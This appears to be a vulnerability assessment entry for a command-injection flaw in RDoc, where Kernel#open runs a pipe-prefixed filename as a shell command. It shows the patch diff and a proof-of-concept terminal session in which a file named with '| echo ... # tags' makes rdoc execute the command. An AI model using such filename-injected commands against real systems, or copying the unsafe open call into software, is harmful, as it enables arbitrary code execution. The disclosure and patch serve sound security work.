In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via | and tags in a filename.
Recent assessments:
wvu-r7 at May 03, 2021 1:43am UTC reported:
Perlisms strike again in this RDoc command injection. Kernel#open
is not safe.
File is lib/rdoc/rdoc.rb
.
##
# Removes file extensions known to be unparseable from +files+ and TAGS
# files for emacs and vim.
def remove_unparseable files
files.reject do |file, *|
file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
(file =~ /tags$/i and
- open(file, 'rb') { |io|
+ File.open(file, 'rb') { |io|
io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
})
end
end
wvu@kharak:~/Downloads/poc$ cat vulnerable
cat: vulnerable: No such file or directory
wvu@kharak:~/Downloads/poc$ touch "| echo HACK THE PLANET > vulnerable # tags"
wvu@kharak:~/Downloads/poc$ rdoc
Parsing sources...
100% [ 1/ 1] | echo HACK THE PLANET > vulnerable # tags
Generating Darkfish format into /Users/wvu/Downloads/poc/doc...
Files: 1
Classes: 0 (0 undocumented)
Modules: 0 (0 undocumented)
Constants: 0 (0 undocumented)
Attributes: 0 (0 undocumented)
Methods: 0 (0 undocumented)
Total: 0 (0 undocumented)
0.00% documented
Elapsed: 0.1s
wvu@kharak:~/Downloads/poc$ cat vulnerable
HACK THE PLANET
wvu@kharak:~/Downloads/poc$
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 3